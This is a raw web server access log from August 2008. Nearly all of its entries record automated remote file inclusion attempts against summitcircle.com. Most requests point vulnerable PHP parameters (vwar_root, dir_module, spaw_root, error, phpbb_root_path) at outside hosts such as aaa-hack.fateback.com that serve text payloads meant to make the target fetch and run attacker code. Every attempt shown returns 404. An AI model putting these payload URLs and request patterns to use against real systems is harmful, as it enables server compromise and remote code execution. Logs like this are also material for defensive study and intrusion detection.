85.214.59.54 - - [03/Aug/2008:17:54:28 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:42 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:54:54 -0700] "GET /logs/access_070924.log%20/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:54:54 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:54:54 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:58 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:07 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:10 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:10 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:10 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:55:10 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
76.74.137.190 - - [03/Aug/2008:17:55:41 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
76.74.137.190 - - [03/Aug/2008:17:55:41 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:55:45 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:56:11 -0700] "GET /logs/access_071224.log/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:56:16 -0700] "GET /main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:56:17 -0700] "GET /logs/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:56:37 -0700] "GET /logs/access_071231.log/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:56:37 -0700] "GET /main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:56:38 -0700] "GET /logs/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:56:46 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:56:46 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:56:46 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:56:46 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:56:47 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:56:47 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:56:47 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:56:53 -0700] "GET /logs/access_070924.log/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:17:56:56 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:56 -0700] "GET /logs/access_071224.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:56 -0700] "GET /logs/access_071224.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:56 -0700] "GET /logs/access_071224.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:17:56:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:17:56:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:56 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:56 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:57 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:57 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:58 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:56:58 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:00 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:17:57:00 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:00 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:17:57:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:17:57:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:14 -0700] "GET /logs/access_070820.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:15 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:15 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:57:20 -0700] "GET /logs/access_070820.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:57:20 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:57:20 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:23 -0700] "GET /logs/access_070820.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:23 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:57:23 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.6.18.240 - - [03/Aug/2008:17:57:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
74.6.31.170 - - [03/Aug/2008:17:57:30 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:57:32 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:58:02 -0700] "GET /logs/access_080121.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:58:03 -0700] "GET /logs/access_080121.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:17:58:03 -0700] "GET /logs/access_080121.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
218.219.147.58 - - [03/Aug/2008:17:59:20 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
218.219.147.58 - - [03/Aug/2008:17:59:20 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
59.126.46.141 - - [03/Aug/2008:17:59:54 -0700] "GET /main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
89.108.64.208 - - [03/Aug/2008:17:59:59 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
125.175.78.175 - - [03/Aug/2008:18:00:12 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
125.175.78.175 - - [03/Aug/2008:18:00:12 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:18:00:29 -0700] "GET /logs/access_070820.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:18:00:29 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:18:00:30 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.139.67.20 - - [03/Aug/2008:18:00:39 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
216.139.67.20 - - [03/Aug/2008:18:00:39 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:18:00:50 -0700] "GET /logs/access_070820.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:18:00:51 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:18:00:51 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:18:00:55 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:18:00:58 -0700] "GET /logs/access_070924.log%20/modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:18:01:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:02:28 -0700] "GET /logs/access_071105.log/components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:02:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:02:28 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:02:39 -0700] "GET /logs/access_071015.log/components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.178.118.47 - - [03/Aug/2008:18:03:04 -0700] "GET ///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.118.47 - - [03/Aug/2008:18:03:07 -0700] "GET /logs///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.118.47 - - [03/Aug/2008:18:03:11 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
213.180.137.72 - - [03/Aug/2008:18:03:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "holmes/3.12 (OnetSzukaj/5.0; +http://szukaj.onet.pl)" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:18:04:03 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
74.6.18.230 - - [03/Aug/2008:18:05:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
74.6.18.230 - - [03/Aug/2008:18:05:15 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:10:38 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:10:39 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:10:39 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:10:48 -0700] "GET /logs/access_071015.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:10:48 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:18:10:49 -0700] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.126.108.198 - - [03/Aug/2008:18:11:04 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [03/Aug/2008:18:11:04 -0700] "GET ///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [03/Aug/2008:18:11:04 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [03/Aug/2008:18:11:04 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [03/Aug/2008:18:11:05 -0700] "GET ///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [03/Aug/2008:18:11:05 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:18:11:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:11:37 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:11:37 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:11:37 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:18:12:11 -0700] "GET /logs/access.log//vwar/backup/errors.php?error=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:18:12:11 -0700] "GET //vwar/backup/errors.php?error=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:18:12:11 -0700] "GET /logs//vwar/backup/errors.php?error=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:15:32 -0700] "GET /logs/access_080210.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:15:32 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
